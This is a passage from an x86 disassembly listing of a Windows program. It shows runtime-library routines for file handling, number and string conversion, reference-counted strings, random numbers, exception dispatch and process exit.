sub_4017A8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017C8 proc near ; CODE XREF: CODE:0040430D�p
; CODE:00404511�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
push ebx
push 0D7B2h
push offset loc_401714
push 65h
call sub_40171C
pop ebx
pop ebp
retn 4
sub_4017C8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4017E8 proc near ; CODE XREF: sub_402CDC+128�p
; CODE:0040431C�p ...
push ebx
push esi
mov ebx, eax
xor esi, esi
mov ax, [ebx+4]
cmp ax, 0D7B1h
jb short loc_401827
cmp ax, 0D7B3h
ja short loc_401827
and ax, 0D7B2h
cmp ax, 0D7B2h
jnz short loc_40180F
mov eax, ebx
call dword ptr [ebx+1Ch]
mov esi, eax
loc_40180F: ; CODE XREF: sub_4017E8+1E�j
test esi, esi
jnz short loc_40181A
mov eax, ebx
call dword ptr [ebx+24h]
mov esi, eax
loc_40181A: ; CODE XREF: sub_4017E8+29�j
test esi, esi
jz short loc_401839
mov eax, esi
call sub_401248
jmp short loc_401839
; ---------------------------------------------------------------------------
loc_401827: ; CODE XREF: sub_4017E8+E�j
; sub_4017E8+14�j
cmp ebx, offset dword_406024
jz short loc_401839
mov eax, 67h
call sub_401248
loc_401839: ; CODE XREF: sub_4017E8+34�j
; sub_4017E8+3D�j ...
mov eax, esi
pop esi
pop ebx
retn
sub_4017E8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401840 proc near ; CODE XREF: sub_4030FC+1F�p
push ebx
mov bl, [edx]
cmp cl, bl
jbe short loc_401849
mov ecx, ebx
loc_401849: ; CODE XREF: sub_401840+5�j
mov [eax], cl
inc edx
inc eax
and ecx, 0FFh
xchg eax, edx
call sub_401264
pop ebx
retn
sub_401840 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40185C proc near ; CODE XREF: sub_402CDC+64�p
; sub_402CDC+C0�p
push ebx
push esi
mov ebx, eax
or esi, 0FFFFFFFFh
mov ax, [ebx+4]
cmp ax, 0D7B0h
jbe short loc_401896
cmp ax, 0D7B3h
ja short loc_401896
push 0
mov eax, [ebx]
push eax
call sub_401084 ; GetFileSize
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40188B
call sub_401258
jmp short loc_4018A0
; ---------------------------------------------------------------------------
loc_40188B: ; CODE XREF: sub_40185C+26�j
mov eax, esi
xor edx, edx
div dword ptr [ebx+8]
mov esi, eax
jmp short loc_4018A0
; ---------------------------------------------------------------------------
loc_401896: ; CODE XREF: sub_40185C+F�j
; sub_40185C+15�j
mov eax, 67h
call sub_401248
loc_4018A0: ; CODE XREF: sub_40185C+2D�j
; sub_40185C+38�j
mov eax, esi
pop esi
pop ebx
retn
sub_40185C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4018A8 proc near ; CODE XREF: sub_4016A4+F�p
; sub_40265C+F1�p ...
push edi
mov edi, eax
mov ch, cl
mov eax, ecx
shl eax, 10h
mov ax, cx
mov ecx, edx
sar ecx, 2
js short loc_4018C5
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_4018C5: ; CODE XREF: sub_4018A8+12�j
pop edi
retn
sub_4018A8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4018C8 proc near ; CODE XREF: CODE:00404209�p
; CODE:0040421E�p ...
push ebx
xor ebx, ebx
imul edx, ds:dword_405008[ebx], 8088405h
inc edx
mov ds:dword_405008[ebx], edx
mul edx
mov eax, edx
pop ebx
retn
sub_4018C8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4018E4 proc near ; DATA XREF: sub_40190C+35�o
push ebx
push esi
mov ebx, eax
mov word ptr [ebx+4], 0D7B0h
xor esi, esi
mov eax, [ebx]
call sub_4014C8
test al, al
jnz short loc_401905
call sub_401258
mov esi, 1
loc_401905: ; CODE XREF: sub_4018E4+15�j
mov eax, esi
pop esi
pop ebx
retn
sub_4018E4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40190C proc near ; CODE XREF: sub_4019EC+16�p
; sub_401A08+5�p
push ebx
push esi
push edi
mov esi, edx
mov edi, ecx
xor edx, edx
mov ebx, eax
mov dx, [eax+4]
sub edx, 0D7B0h
jz short loc_401938
cmp edx, 3
ja loc_4019CE
call dword ptr [ebx+24h]
test eax, eax
jz short loc_401938
call sub_401248
loc_401938: ; CODE XREF: sub_40190C+15�j
; sub_40190C+25�j
mov word ptr [ebx+4], 0D7B3h
mov [ebx+8], esi
mov dword ptr [ebx+24h], offset sub_4018E4
mov dword ptr [ebx+1Ch], offset sub_401488
cmp byte ptr [ebx+48h], 0
jz short loc_4019B5
mov eax, 0C0000000h
mov dl, ds:byte_40500C
and edx, 70h
shr edx, 2
mov edx, ds:dword_405068[edx]
mov ecx, 2
sub edi, 3
jz short loc_401997
mov ecx, 3
inc edi
jz short loc_401997
mov eax, 40000000h
inc edi
mov word ptr [ebx+4], 0D7B2h
jz short loc_401997
mov eax, 80000000h
mov word ptr [ebx+4], 0D7B1h
loc_401997: ; CODE XREF: sub_40190C+68�j
; sub_40190C+70�j ...
push 0
push 80h
push ecx
push 0
push edx
push eax
lea eax, [ebx+48h]
push eax
call sub_40106C ; CreateFileA
loc_4019AC: ; CODE XREF: sub_40190C+C0�j
cmp eax, 0FFFFFFFFh
jz short loc_4019D5
mov [ebx], eax
jmp short loc_4019E5
; ---------------------------------------------------------------------------
loc_4019B5: ; CODE XREF: sub_40190C+47�j
mov dword ptr [ebx+24h], offset sub_401488
cmp edi, 3
jz short loc_4019C5
push 0FFFFFFF6h
jmp short loc_4019C7
; ---------------------------------------------------------------------------
loc_4019C5: ; CODE XREF: sub_40190C+B3�j
push 0FFFFFFF5h
loc_4019C7: ; CODE XREF: sub_40190C+B7�j
call sub_40108C ; GetStdHandle
jmp short loc_4019AC
; ---------------------------------------------------------------------------
loc_4019CE: ; CODE XREF: sub_40190C+1A�j
mov eax, 66h
jmp short loc_4019E0
; ---------------------------------------------------------------------------
loc_4019D5: ; CODE XREF: sub_40190C+A3�j
mov word ptr [ebx+4], 0D7B0h
call sub_4010D4 ; RtlGetLastWin32Error
loc_4019E0: ; CODE XREF: sub_40190C+C7�j
call sub_401248
loc_4019E5: ; CODE XREF: sub_40190C+A7�j
pop edi
pop esi
pop ebx
retn
sub_40190C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4019EC proc near ; CODE XREF: sub_402CDC+54�p
mov cl, ds:byte_40500C
and cl, 3
cmp cl, 2
jbe short loc_4019FC
mov cl, 2
loc_4019FC: ; CODE XREF: sub_4019EC+C�j
and ecx, 0FFh
call sub_40190C
retn
sub_4019EC endp
; =============== S U B R O U T I N E =======================================
sub_401A08 proc near ; CODE XREF: CODE:004042E4�p
; CODE:004044E8�p
mov ecx, 3
call sub_40190C
retn
sub_401A08 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401A14 proc near ; CODE XREF: sub_401A74+4�p
var_26 = byte ptr -26h
var_24 = byte ptr -24h
var_10 = dword ptr -10h
push ebx
push esi
push edi
push edx
sub esp, 14h
mov edi, ecx
mov esi, eax
cdq
xor eax, edx
sub eax, edx
mov ecx, 0Ah
xor ebx, ebx
loc_401A2B: ; CODE XREF: sub_401A14+24�j
xor edx, edx
div ecx
add edx, 30h
mov [esp+ebx+24h+var_24], dl
inc ebx
test eax, eax
jnz short loc_401A2B
test esi, esi
jge short loc_401A43
mov [esp+ebx+24h+var_24], 2Dh
inc ebx
loc_401A43: ; CODE XREF: sub_401A14+28�j
mov [edi], bl
inc edi
mov ecx, [esp+24h+var_10]
cmp ecx, 0FFh
jle short loc_401A57
mov ecx, 0FFh
loc_401A57: ; CODE XREF: sub_401A14+3C�j
sub ecx, ebx
jle short loc_401A62
add [edi-1], cl
mov al, 20h
rep stosb
loc_401A62: ; CODE XREF: sub_401A14+45�j
; sub_401A14+56�j
mov al, [esp+ebx-1]
mov [edi], al
inc edi
dec ebx
jnz short loc_401A62
add esp, 18h
pop edi
pop esi
pop ebx
retn
sub_401A14 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401A74 proc near ; CODE XREF: sub_4030FC+12�p
mov ecx, edx
xor edx, edx
call sub_401A14
retn
sub_401A74 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401A80 proc near ; CODE XREF: sub_403134+3�p
push ebx
push esi
push edi
mov esi, eax
push eax
test eax, eax
jz short loc_401AF6
xor eax, eax
xor ebx, ebx
mov edi, 0CCCCCCCh
loc_401A93: ; CODE XREF: sub_401A80+19�j
mov bl, [esi]
inc esi
cmp bl, 20h
jz short loc_401A93
mov ch, 0
cmp bl, 2Dh
jz short loc_401B04
cmp bl, 2Bh
jz short loc_401B06
cmp bl, 24h
jz short loc_401B0B
cmp bl, 78h
jz short loc_401B0B
cmp bl, 58h
jz short loc_401B0B
cmp bl, 30h
jnz short loc_401ACE
mov bl, [esi]
inc esi
cmp bl, 78h
jz short loc_401B0B
cmp bl, 58h
jz short loc_401B0B
test bl, bl
jz short loc_401AEC
jmp short loc_401AD2
; ---------------------------------------------------------------------------
loc_401ACE: ; CODE XREF: sub_401A80+39�j
; sub_401A80+89�j
test bl, bl
jz short loc_401AFF
loc_401AD2: ; CODE XREF: sub_401A80+4C�j
; sub_401A80+6A�j
sub bl, 30h
cmp bl, 9
ja short loc_401AFF
cmp eax, edi
ja short loc_401AFF
lea eax, [eax+eax*4]
add eax, eax
add eax, ebx
mov bl, [esi]
inc esi
test bl, bl
jnz short loc_401AD2
loc_401AEC: ; CODE XREF: sub_401A80+4A�j
dec ch
jz short loc_401AF9
test eax, eax
jge short loc_401B42
jmp short loc_401AFF
; ---------------------------------------------------------------------------
loc_401AF6: ; CODE XREF: sub_401A80+8�j
; sub_401A80+95�j
inc esi
jmp short loc_401AFF
; ---------------------------------------------------------------------------
loc_401AF9: ; CODE XREF: sub_401A80+6E�j
neg eax
jle short loc_401B42
js short loc_401B42
loc_401AFF: ; CODE XREF: sub_401A80+50�j
; sub_401A80+58�j ...
pop ebx
sub esi, ebx
jmp short loc_401B45
; ---------------------------------------------------------------------------
loc_401B04: ; CODE XREF: sub_401A80+20�j
inc ch
loc_401B06: ; CODE XREF: sub_401A80+25�j
mov bl, [esi]
inc esi
jmp short loc_401ACE
; ---------------------------------------------------------------------------
loc_401B0B: ; CODE XREF: sub_401A80+2A�j
; sub_401A80+2F�j ...
mov edi, 0FFFFFFFh
mov bl, [esi]
inc esi
test bl, bl
jz short loc_401AF6
loc_401B17: ; CODE XREF: sub_401A80+C0�j
cmp bl, 61h
jb short loc_401B1F
sub bl, 20h
loc_401B1F: ; CODE XREF: sub_401A80+9A�j
sub bl, 30h
cmp bl, 9
jbe short loc_401B32
sub bl, 11h
cmp bl, 5
ja short loc_401AFF
add bl, 0Ah
loc_401B32: ; CODE XREF: sub_401A80+A5�j
cmp eax, edi
ja short loc_401AFF
shl eax, 4
add eax, ebx
mov bl, [esi]
inc esi
test bl, bl
jnz short loc_401B17
loc_401B42: ; CODE XREF: sub_401A80+72�j
; sub_401A80+7B�j ...
pop ecx
xor esi, esi
loc_401B45: ; CODE XREF: sub_401A80+82�j
mov [edx], esi
pop edi
pop esi
pop ebx
retn
sub_401A80 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401B4C proc near ; CODE XREF: sub_401B6C+C�p
test ecx, ecx
jz short locret_401B69
mov eax, [ecx+1]
cmp byte ptr [ecx], 0E9h
jz short loc_401B64
cmp byte ptr [ecx], 0EBh
jnz short locret_401B69
movsx eax, al
inc ecx
inc ecx
jmp short loc_401B67
; ---------------------------------------------------------------------------
loc_401B64: ; CODE XREF: sub_401B4C+A�j
add ecx, 5
loc_401B67: ; CODE XREF: sub_401B4C+16�j
add ecx, eax
locret_401B69: ; CODE XREF: sub_401B4C+2�j
; sub_401B4C+F�j
retn
sub_401B4C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401B6C proc near ; CODE XREF: sub_402C0C-1053�p
cmp ds:byte_405010, 1
jbe short locret_401B92
push eax
push edx
push ecx
call sub_401B4C
push ecx
push esp
push 1
push 0
push 0EEDFAE1h
call ds:off_406008
pop ecx
pop ecx
pop edx
pop eax
locret_401B92: ; CODE XREF: sub_401B6C+7�j
retn
sub_401B6C endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_402C0C
loc_401B94: ; CODE XREF: sub_4028CC:loc_402908�j
; sub_402A2C:loc_402A51�j ...
mov eax, [esp-4+arg_0]
mov edx, [esp-4+arg_4]
test dword ptr [eax+4], 6
jz short loc_401BC4
mov ecx, [edx+4]
mov dword ptr [edx+4], offset loc_401BC4
push ebx
push esi
push edi
push ebp
mov ebp, [edx+8]
add ecx, 5
call sub_401B6C
call ecx
pop ebp
pop edi
pop esi
pop ebx
loc_401BC4: ; CODE XREF: sub_402C0C-1069�j
; DATA XREF: sub_402C0C-1064�o
mov eax, 1
retn
; END OF FUNCTION CHUNK FOR sub_402C0C
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401BCC proc near ; CODE XREF: sub_401CDC:loc_401D2A�p
; DATA XREF: DATA:off_405030�o
push ebx
push esi
push edi
push ebp
mov edi, offset dword_4063C4
mov eax, [edi+8]
test eax, eax
jz short loc_401BFA
mov ebx, [edi+0Ch]
mov esi, [eax+4]
test ebx, ebx
jle short loc_401BFA
loc_401BE6: ; CODE XREF: sub_401BCC+2C�j
dec ebx
mov [edi+0Ch], ebx
mov eax, [esi+ebx*8+4]
test eax, eax
jz short loc_401BF6
mov ebp, eax
call ebp
loc_401BF6: ; CODE XREF: sub_401BCC+24�j
test ebx, ebx
jg short loc_401BE6
loc_401BFA: ; CODE XREF: sub_401BCC+E�j
; sub_401BCC+18�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401BCC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401C00 proc near ; CODE XREF: sub_401C00+43�p
; sub_401C54+12�p
; DATA XREF: ...
push ebx
push esi
push edi
push ebp
mov edi, ecx
mov ebp, edx
mov esi, eax
mov eax, offset sub_401C00
cmp eax, ds:off_40502C
setz bl
cmp edi, ebp
jle short loc_401C4F
loc_401C1C: ; CODE XREF: sub_401C00+4D�j
mov eax, [esi+ebp*8]
inc ebp
mov ds:dword_4063D0, ebp
test eax, eax
jz short loc_401C2C
call eax
loc_401C2C: ; CODE XREF: sub_401C00+28�j
test bl, bl
jz short loc_401C4B
mov eax, offset sub_401C00
cmp eax, ds:off_40502C
jz short loc_401C4B
mov ecx, edi
mov edx, ebp
mov eax, esi
call ds:off_40502C
jmp short loc_401C4F
; ---------------------------------------------------------------------------
loc_401C4B: ; CODE XREF: sub_401C00+2E�j
; sub_401C00+3B�j
cmp edi, ebp
jg short loc_401C1C
loc_401C4F: ; CODE XREF: sub_401C00+1A�j
; sub_401C00+49�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401C00 endp
; =============== S U B R O U T I N E =======================================
sub_401C54 proc near ; CODE XREF: sub_401C70+35�p
mov eax, ds:off_4063CC
test eax, eax
jz short locret_401C6C
mov edx, [eax]
xor ecx, ecx
mov eax, [eax+4]
xchg ecx, edx
call ds:off_40502C
locret_401C6C: ; CODE XREF: sub_401C54+7�j
retn
sub_401C54 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401C70 proc near ; CODE XREF: sub_4029E8+3A�p
mov ds:off_406008, offset sub_401094
mov ds:off_40600C, offset loc_4010A4
mov ds:off_4063CC, eax
xor eax, eax
mov ds:dword_4063D0, eax
mov ds:off_4063D4, edx
mov eax, [edx+4]
mov ds:dword_406014, eax
mov ds:byte_40601C, 0
call sub_401C54
retn
sub_401C70 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401CAC proc near ; CODE XREF: sub_401CDC+96�p
xor eax, eax
xchg eax, ds:dword_405000
neg eax
sbb eax, eax
inc eax
mov edi, offset dword_4063C4
mov ebx, [edi+18h]
mov ebp, [edi+14h]
push dword ptr [edi+1Ch]
push dword ptr [edi+20h]
mov esi, [edi]
mov ecx, 0Bh
rep movsd
pop edi
pop esi
leave
retn 0Ch
sub_401CAC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_401CDC proc near ; CODE XREF: sub_401DAC+5�p
; CODE:0040481D�p
push ebx
push esi
push edi
push ebp
mov ebx, offset dword_4063C4
mov esi, offset dword_405000
mov edi, offset dword_406020
cmp byte ptr [ebx+28h], 0
jnz short loc_401D0B
cmp dword ptr [edi], 0
jz short loc_401D0B
loc_401CFA: ; CODE XREF: sub_401CDC+2D�j
mov edx, [edi]
mov eax, edx
xor edx, edx
mov [edi], edx
mov ebp, eax
call ebp
cmp dword ptr [edi], 0
jnz short loc_401CFA
loc_401D0B: ; CODE XREF: sub_401CDC+17�j
; sub_401CDC+1C�j
cmp ds:dword_405004, 0
jz short loc_401D1A
call ds:off_405088
loc_401D1A: ; CODE XREF: sub_401CDC+36�j
; sub_401CDC+C6�j
cmp byte ptr [ebx+28h], 2
jnz short loc_401D2A
cmp dword ptr [esi], 0
jnz short loc_401D2A
xor eax, eax
mov [ebx+0Ch], eax
loc_401D2A: ; CODE XREF: sub_401CDC+42�j
; sub_401CDC+47�j
call ds:off_405030
cmp byte ptr [ebx+28h], 1
jbe short loc_401D3B
cmp dword ptr [esi], 0
jz short loc_401D5D
loc_401D3B: ; CODE XREF: sub_401CDC+58�j
mov eax, [ebx+10h]
test eax, eax
jz short loc_401D5D
call ds:off_405020
mov edx, [ebx+10h]
mov eax, [edx+10h]
cmp eax, [edx+4]
jz short loc_401D5D
test eax, eax
jz short loc_401D5D
push eax
call sub_40102C ; FreeLibrary
loc_401D5D: ; CODE XREF: sub_401CDC+5D�j
; sub_401CDC+64�j ...
call ds:off_405034
cmp byte ptr [ebx+28h], 1
jnz short loc_401D6C
call dword ptr [ebx+24h]
loc_401D6C: ; CODE XREF: sub_401CDC+8B�j
cmp byte ptr [ebx+28h], 0
jz short loc_401D77
call sub_401CAC
loc_401D77: ; CODE XREF: sub_401CDC+94�j
cmp dword ptr [ebx], 0
jnz short loc_401D93
cmp ds:dword_406010, 0
jz short loc_401D8B
call ds:dword_406010
loc_401D8B: ; CODE XREF: sub_401CDC+A7�j
mov eax, [esi]
push eax
call sub_4010CC ; ExitProcess
loc_401D93: ; CODE XREF: sub_401CDC+9E�j
mov eax, [ebx]
push esi
mov esi, eax
mov edi, ebx
mov ecx, 0Bh
rep movsd
pop esi
jmp loc_401D1A
sub_401CDC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pop ebp
pop edi
pop esi
pop ebx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_401DAC proc near ; CODE XREF: sub_4011C4+6�p
; sub_401DB8+6�j
mov ds:dword_405000, eax
call sub_401CDC
sub_401DAC endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_401DB8 proc near ; CODE XREF: sub_402958+1A�p
; sub_402958+2F�p
pop ds:dword_405004
jmp sub_401DAC
sub_401DB8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_401DC4 proc near ; CODE XREF: sub_4013B0+F�p
; sub_401EB0+23�p ...
mov edx, [eax]
test edx, edx
jz short locret_401DE5
mov dword ptr [eax], 0
mov ecx, [edx-8]
dec ecx
jl short locret_401DE5
dec dword ptr [edx-8]
jnz short locret_401DE5
push eax
lea eax, [edx-8]
call sub_40115C
pop eax
locret_401DE5: ; CODE XREF: sub_401DC4+4�j
; sub_401DC4+10�j ...
retn
sub_401DC4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401DE8 proc near ; CODE XREF: sub_402260+56�p
; sub_402C0C+90�p ...
push ebx
push esi
mov ebx, eax
mov esi, edx
loc_401DEE: ; CODE XREF: sub_401DE8+29�j
mov edx, [ebx]
test edx, edx
jz short loc_401E0D
mov dword ptr [ebx], 0
mov ecx, [edx-8]
dec ecx
jl short loc_401E0D
dec dword ptr [edx-8]
jnz short loc_401E0D
lea eax, [edx-8]
call sub_40115C
loc_401E0D: ; CODE XREF: sub_401DE8+A�j
; sub_401DE8+16�j ...
add ebx, 4
dec esi
jnz short loc_401DEE
pop esi
pop ebx
retn
sub_401DE8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401E18 proc near ; CODE XREF: sub_401F0C+8�j
; sub_401F50+6�j ...
test edx, edx
jz short loc_401E3F
mov ecx, [edx-8]
inc ecx
jg short loc_401E3C
push eax
push edx
mov eax, [edx-4]
call sub_401E84
mov edx, eax
pop eax
push edx
mov ecx, [eax-4]
call sub_401264
pop edx
pop eax
jmp short loc_401E3F
; ---------------------------------------------------------------------------
loc_401E3C: ; CODE XREF: sub_401E18+8�j
inc dword ptr [edx-8]
loc_401E3F: ; CODE XREF: sub_401E18+2�j
; sub_401E18+22�j
xchg edx, [eax]
test edx, edx
jz short locret_401E58
mov ecx, [edx-8]
dec ecx
jl short locret_401E58
dec dword ptr [edx-8]
jnz short locret_401E58
lea eax, [edx-8]
call sub_40115C
locret_401E58: ; CODE XREF: sub_401E18+2B�j
; sub_401E18+31�j ...
retn
sub_401E18 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401E5C proc near ; CODE XREF: sub_403168+30�p
test edx, edx
jz short loc_401E69
mov ecx, [edx-8]
inc ecx
jle short loc_401E69
inc dword ptr [edx-8]
loc_401E69: ; CODE XREF: sub_401E5C+2�j
; sub_401E5C+8�j
xchg edx, [eax]
test edx, edx
jz short locret_401E82
mov ecx, [edx-8]
dec ecx
jl short locret_401E82
dec dword ptr [edx-8]
jnz short locret_401E82
lea eax, [edx-8]
call sub_40115C
locret_401E82: ; CODE XREF: sub_401E5C+11�j
; sub_401E5C+17�j ...
retn
sub_401E5C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401E84 proc near ; CODE XREF: sub_401E18+F�p
; sub_401EB0+B�p ...
test eax, eax
jle short loc_401EAC
push eax
add eax, 0Ah
and eax, 0FFFFFFFEh
push eax
call sub_401144
pop edx
mov word ptr [edx+eax-2], 0
add eax, 8
pop edx
mov [eax-4], edx
mov dword ptr [eax-8], 1
retn
; ---------------------------------------------------------------------------
loc_401EAC: ; CODE XREF: sub_401E84+2�j
xor eax, eax
retn
sub_401E84 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401EB0 proc near ; CODE XREF: sub_4013B0+2F�p
; sub_401EE0+5�j ...
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, ecx
mov eax, edi
call sub_401E84
mov ecx, edi
mov edi, eax
test esi, esi
jz short loc_401ED1
mov edx, eax
mov eax, esi
call sub_401264
loc_401ED1: ; CODE XREF: sub_401EB0+16�j
mov eax, ebx
call sub_401DC4
mov [ebx], edi
pop edi
pop esi
pop ebx
retn
sub_401EB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401EE0 proc near ; CODE XREF: sub_4030FC+28�p
xor ecx, ecx
mov cl, [edx]
inc edx
jmp sub_401EB0
sub_401EE0 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401EEC proc near ; CODE XREF: sub_403038+8B�p
; sub_4033B0+6D�p ...
push edi
push eax
push ecx
mov edi, edx
xor eax, eax
repne scasb
jnz short loc_401EF9
not ecx
loc_401EF9: ; CODE XREF: sub_401EEC+9�j
pop eax
add ecx, eax
pop eax
pop edi
jmp sub_401EB0
sub_401EEC endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_401F04 proc near ; CODE XREF: sub_4016A4+3E�p
; sub_4016A4+56�p ...
test eax, eax
jz short locret_401F0B
mov eax, [eax-4]
locret_401F0B: ; CODE XREF: sub_401F04+2�j
retn
sub_401F04 endp
; =============== S U B R O U T I N E =======================================
sub_401F0C proc near ; CODE XREF: sub_401F50+1D�j
; sub_401F50+6E�j ...
test edx, edx
jz short locret_401F4F
mov ecx, [eax]
test ecx, ecx
jz sub_401E18
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, [ecx-4]
mov edx, [esi-4]
add edx, edi
cmp esi, ecx
jz short loc_401F44
call sub_402184
mov eax, esi
mov ecx, [esi-4]
loc_401F37: ; CODE XREF: sub_401F0C+41�j
mov edx, [ebx]
add edx, edi
call sub_401264
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401F44: ; CODE XREF: sub_401F0C+1F�j
call sub_402184
mov eax, [ebx]
mov ecx, edi
jmp short loc_401F37
; ---------------------------------------------------------------------------
locret_401F4F: ; CODE XREF: sub_401F0C+2�j
retn
sub_401F0C endp
; =============== S U B R O U T I N E =======================================
sub_401F50 proc near ; CODE XREF: CODE:004042C5�p
test edx, edx
jz short loc_401FB5
test ecx, ecx
jz sub_401E18
cmp edx, [eax]
jz short loc_401FBC
cmp ecx, [eax]
jz short loc_401F72
push eax
push ecx
call sub_401E18
pop edx
pop eax
jmp sub_401F0C
; ---------------------------------------------------------------------------
loc_401F72: ; CODE XREF: sub_401F50+12�j
push ebx
push esi
push edi
mov ebx, edx
mov esi, ecx
push eax
mov eax, [ebx-4]
add eax, [esi-4]
call sub_401E84
mov edi, eax
mov edx, eax
mov eax, ebx
mov ecx, [ebx-4]
call sub_401264
mov edx, edi
mov eax, esi
mov ecx, [esi-4]
add edx, [ebx-4]
call sub_401264
pop eax
mov edx, edi
test edi, edi
jz short loc_401FAC
dec dword ptr [edi-8]
loc_401FAC: ; CODE XREF: sub_401F50+57�j
call sub_401E18
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401FB5: ; CODE XREF: sub_401F50+2�j
mov edx, ecx
jmp sub_401E18
; ---------------------------------------------------------------------------
loc_401FBC: ; CODE XREF: sub_401F50+E�j
mov edx, ecx
jmp sub_401F0C
sub_401F50 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_401FC4 proc near ; CODE XREF: CODE:00404252�p
; CODE:004044C9�p ...
push ebx
push esi
push edi
push edx
push eax
mov ebx, edx
xor edi, edi
mov ecx, [esp+edx*4+14h]
test ecx, ecx
jz short loc_401FDB
cmp [eax], ecx
jnz short loc_401FDB
mov edi, eax
loc_401FDB: ; CODE XREF: sub_401FC4+F�j
; sub_401FC4+13�j
xor eax, eax
loc_401FDD: ; CODE XREF: sub_401FC4+2B�j
mov ecx, [esp+edx*4+14h]
test ecx, ecx
jz short loc_401FEE
add eax, [ecx-4]
cmp edi, ecx
jnz short loc_401FEE
xor edi, edi
loc_401FEE: ; CODE XREF: sub_401FC4+1F�j
; sub_401FC4+26�j
dec edx
jnz short loc_401FDD
test edi, edi
jz short loc_402009
mov edx, eax
mov eax, edi
mov esi, [edi]
mov esi, [esi-4]
call sub_402184
push edi
add esi, [edi]
dec ebx
jmp short loc_402011
; ---------------------------------------------------------------------------
loc_402009: ; CODE XREF: sub_401FC4+2F�j
call sub_401E84
push eax
mov esi, eax
loc_402011: ; CODE XREF: sub_401FC4+43�j
; sub_401FC4+62�j
mov eax, [esp+ebx*4+18h]
mov edx, esi
test eax, eax
jz short loc_402025
mov ecx, [eax-4]
add esi, ecx
call sub_401264
loc_402025: ; CODE XREF: sub_401FC4+55�j
dec ebx
jnz short loc_402011
pop edx
pop eax
test edi, edi
jnz short loc_40203A
test edx, edx
jz short loc_402035
dec dword ptr [edx-8]
loc_402035: ; CODE XREF: sub_401FC4+6C�j
call sub_401E18
loc_40203A: ; CODE XREF: sub_401FC4+68�j
pop edx
pop edi
pop esi
pop ebx
pop eax
lea esp, [esp+edx*4]
jmp eax
sub_401FC4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402048 proc near ; CODE XREF: sub_402C0C+12�p
; sub_402C0C+1A�p ...
test eax, eax
jz short locret_402055
mov edx, [eax-8]
inc edx
jle short locret_402055
inc dword ptr [eax-8]
locret_402055: ; CODE XREF: sub_402048+2�j
; sub_402048+8�j
retn
sub_402048 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402058 proc near ; CODE XREF: sub_4016A4+46�p
; sub_402C0C+3C�p ...
test eax, eax
jz short loc_40205E
retn
; ---------------------------------------------------------------------------
byte_40205D db 0 ; DATA XREF: sub_402058:loc_40205E�o
; ---------------------------------------------------------------------------
loc_40205E: ; CODE XREF: sub_402058+2�j
mov eax, offset byte_40205D
retn
sub_402058 endp
; =============== S U B R O U T I N E =======================================
sub_402064 proc near ; CODE XREF: sub_4020A4�j sub_4020AC�j
mov edx, [eax]
test edx, edx
jz short loc_4020A1
mov ecx, [edx-8]
dec ecx
jz short loc_4020A1
push ebx
mov ebx, eax
